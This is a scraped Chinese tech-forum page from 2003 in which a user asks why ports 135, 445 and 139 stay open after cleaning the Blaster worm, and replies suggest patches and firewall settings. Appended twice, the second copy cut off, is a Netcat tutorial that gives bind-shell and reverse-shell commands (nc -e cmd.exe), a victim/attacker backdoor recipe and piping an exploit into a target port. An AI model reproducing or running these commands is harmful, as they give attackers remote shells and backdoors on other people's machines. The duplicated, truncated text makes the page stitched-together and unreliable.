几个端口不停的打开:135、445、139、。

frajldss 2003-08-23 08:31:46
我的机子这几天刚染了“冲击波”,用金山下载的冲击波专杀工具杀掉以后。现在有几个端口不停的打开:135、445、139、。
请问是不是还没有杀干净?需要怎么处理?


杀毒的时候确实吧网络断开了。
放火墙是用的VRV,已经升级到最新,20号的
补丁是金山上下的。
我的系统是win2k Server (SP2)。可能版本低会影响。

染病毒的时候无法粘贴,用金山下载的冲击波专杀工具杀了以后,查到了病毒,现在可以粘贴了。但是还是出现 端口:135、445、139不停的打开的情况。


有的网站上说杀毒以后需要升级Windows系统到Server Pack3以上。但是到微软的网站上太贵了,请问还有别的链接吗??

*************采用NetSafe的结果**********************

8月22日21时0分33秒, 黑客端口被打开 {本地地址:0.0.0.0,本地端口:135 远程地址:*:*,远程端口: }
8月22日21时0分33秒, 黑客端口被打开 {本地地址:0.0.0.0,本地端口:445 远程地址:*:*,远程端口: }
8月22日21时0分38秒, 黑客端口被打开 {本地地址:0.0.0.0,本地端口:135 远程地址:0.0.0.0,远程端口:0 }
8月22日21时0分38秒, 黑客端口被打开 {本地地址:0.0.0.0,本地端口:445 远程地址:0.0.0.0,远程端口:0 }
8月22日21时0分38秒, 黑客端口被打开 {本地地址:202.119.92.238,本地端口:139 远程地址:0.0.0.0,远程端口:0 }
8月22日21时0分38秒, 黑客端口被打开 {本地地址:0.0.0.0,本地端口:135 远程地址:*:*,远程端口: }
8月22日21时0分38秒, 黑客端口被打开 {本地地址:0.0.0.0,本地端口:445 远程地址:*:*,远程端口: }
...全文
96 6 打赏 收藏 转发到动态 举报
写回复
用AI写文章
6 条回复
切换为时间正序
请发表友善的回复…
发表回复
wtfeng 2003-08-24
  • 打赏
  • 举报
回复
这此是正常的微软的远程通讯服务端口,默认是打开的,可提高防火墙的安全性来防止外来连接这些端口.或者干脆把netbios协议去掉.
alexdyong 2003-08-24
  • 打赏
  • 举报
回复
你的不停的被打开是什么意思?是被别人不停的打开,还是自己的软件搞的鬼?
你用防火墙关闭了或则在TCP/IP的属性里关了之后还是被不停的打开么?
请说清楚!
TianZhang 2003-08-23
  • 打赏
  • 举报
回复
关键补丁:KB823980
直接用Windows Update,省事。建议先装SP4。
微软的网站下载速度并不慢。嫌不够快的话到www.skycn.com去好了,那里一般100-200K/s
yinshulin 2003-08-23
  • 打赏
  • 举报
回复
这可能没有吧,

微软的网站不行了,你就别想了吧,

我也没有发现过,我倒是有,不过光升级也没有用呀,还要关掉端口呀,
你可以看相关网站呀,都有方法的

感谢各位 2003-08-23
  • 打赏
  • 举报
回复
1、很多地方可以下载到windows 2000 的 sp4 ,你可以找一下,不收费(包括微软),但上网费用需要自己花,你的意思应该是到微软那里升级速度慢,时间长,也就费用相对大,可以找朋友看谁有现成的

2、你的不停打开,是否是指 你用防火墙拦截到了一些未经过允许的程序通过这些端口向外发送信息?
newmanzxk 2003-08-23
  • 打赏
  • 举报
回复
请问外星人“但是到微软的网站上太贵了”是什么意思?属于地球语言么?
软件介绍: 工具名:Netcat 作者:Hobbit && Chris Wysopal 类别:开放源码 平台:Linux/BSD/Unix/Windows WINDOWS下版本号:[v1.10 NT] 参数介绍: *nc.exe -h*即可看到各参数的使用方法。 基本格式:nc [-options] hostname port[s] [ports] … nc -l -p port [options] [hostname] [port] -d 后台模式 -e prog 程序重定向,一旦连接,就执行 [危险!!] -g gateway source-routing hop point[s], up to 8 -G num source-routing pointer: 4, 8, 12, … -h 帮助信息 -i secs 延时的间隔 -l 监听模式,用于入站连接 -L 连接关闭后,仍然继续监听 -n 指定数字的IP地址,不能用hostname -o file 记录16进制的传输 -p port 本地端口号 -r 随机本地及远程端口 -s addr 本地源地址 -t 使用TELNET交互方式 -u UDP模式 -v 详细输出–用两个-v可得到更详细的内容 -w secs timeout的时间 -z 将输入输出关掉–用于扫描时 端口的表示方法可写为M-N的范围格式。 ======================================================== 基本用法: 1)连接到REMOTE主机,例子: 格式:nc -nvv 192.168.x.x 80 讲解:连到192.168.x.x的TCP80端口 2)监听LOCAL主机,例子: 格式:nc -l -p 80 讲解:监听本机的TCP80端口 3)扫描远程主机,例子: 格式:nc -nvv -w2 -z 192.168.x.x 80-445 讲解:扫描192.168.x.x的TCP80到TCP445的所有端口 4)REMOTE主机绑定SHELL,例子: 格式:nc -l -p 5354 -t -e c:winntsystem32cmd.exe 讲解:绑定REMOTE主机的CMDSHELL在REMOTE主机的TCP5354端口 5)REMOTE主机绑定SHELL并反向连接,例子: 格式:nc -t -e c:winntsystem32cmd.exe 192.168.x.x 5354 讲解:绑定REMOTE主机的CMDSHELL并反向连接到192.168.x.x的TCP5354端口 以上为最基本的几种用法(其实NC的用法还有很多, 当配合管道命令”|”与重定向命令””等等命令功能更强大……)。 ======================================================== 高级用法: 6)作攻击程序用,例子: 格式1:type.exe c:exploit.txt|nc -nvv 192.168.x.x 80 格式2:nc -nvv 192.168.x.x 80 c:log.txt 讲解:使用*-L*可以不停地监听某一个端口,直到ctrl+c为止,同时把结果输出到*c:log.txt*中,如果把*>* 改为*>>*即可以追加日志 附:*c:log.txt*为日志等 9)作蜜罐用[3],例子: 格式1:nc -L -p 80 < c:honeypot.txt 格式2:type.exe c:honeypot.txt|nc -L -p 80 讲解:使用*-L*可以不停地监听某一个端口,直到ctrl+c为止,并把*c:honeypot.txt*的内容*送*入其管道中 10) 后门 victim machine: //受害者的机器 nc -l -p port -e cmd //win2000 nc -l -p port -e /bin/sh //unix,linux attacker machine: //攻击者的机器. nc ip -p port //连接victim_IP,然后得到一个shell。 11)反向连接 attacker machine: //一般是sql2,远程溢出,webdavx3攻
软件介绍: 工具名:Netcat 作者:Hobbit && Chris Wysopal 类别:开放源码 平台:Linux/BSD/Unix/Windows WINDOWS下版本号:[v1.10 NT] 参数介绍: *nc.exe -h*即可看到各参数的使用方法。 基本格式:nc [-options] hostname port[s] [ports] … nc -l -p port [options] [hostname] [port] -d 后台模式 -e prog 程序重定向,一旦连接,就执行 [危险!!] -g gateway source-routing hop point[s], up to 8 -G num source-routing pointer: 4, 8, 12, … -h 帮助信息 -i secs 延时的间隔 -l 监听模式,用于入站连接 -L 连接关闭后,仍然继续监听 -n 指定数字的IP地址,不能用hostname -o file 记录16进制的传输 -p port 本地端口号 -r 随机本地及远程端口 -s addr 本地源地址 -t 使用TELNET交互方式 -u UDP模式 -v 详细输出–用两个-v可得到更详细的内容 -w secs timeout的时间 -z 将输入输出关掉–用于扫描时 端口的表示方法可写为M-N的范围格式。 ======================================================== 基本用法: 1)连接到REMOTE主机,例子: 格式:nc -nvv 192.168.x.x 80 讲解:连到192.168.x.x的TCP80端口 2)监听LOCAL主机,例子: 格式:nc -l -p 80 讲解:监听本机的TCP80端口 3)扫描远程主机,例子: 格式:nc -nvv -w2 -z 192.168.x.x 80-445 讲解:扫描192.168.x.x的TCP80到TCP445的所有端口 4)REMOTE主机绑定SHELL,例子: 格式:nc -l -p 5354 -t -e c:winntsystem32cmd.exe 讲解:绑定REMOTE主机的CMDSHELL在REMOTE主机的TCP5354端口 5)REMOTE主机绑定SHELL并反向连接,例子: 格式:nc -t -e c:winntsystem32cmd.exe 192.168.x.x 5354 讲解:绑定REMOTE主机的CMDSHELL并反向连接到192.168.x.x的TCP5354端口 以上为最基本的几种用法(其实NC的用法还有很多, 当配合管道命令”|”与重定向命令””等等命令功能更强大……)。 ======================================================== 高级用法: 6)作攻击程序用,例子: 格式1:type.exe c:exploit.txt|nc -nvv 192.168.x.x 80 格式2:nc -nvv 192.168.x.x 80 c:log.txt 讲解:使用*-L*可以不停地监听某一个端口,直到ctrl+c为止,同时把结果输出到*c:log.txt*中,如果把*>* 改为*>>*即可以追加日志 附:*c:log.txt*为日志等 9)作蜜罐用[3],例子: 格式1:nc -L -p 80 < c:honeypot.txt 格式2:type.exe c:honeypot.txt|nc -L -p 80 讲解:使用*-L*可以不停地监听某一个端口,直到ctrl+c为止,并把*c:honeypot.txt*的内容*送*入其管道中 10) 后门 victim machine: //受害者的机器 nc -l -p port -e cmd //win2000 nc -l -p port -e /bin/sh //unix,linux

9,506

社区成员

发帖
与我相关
我的任务
社区描述
Windows专区 安全技术/病毒
社区管理员
  • 安全技术/病毒社区
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧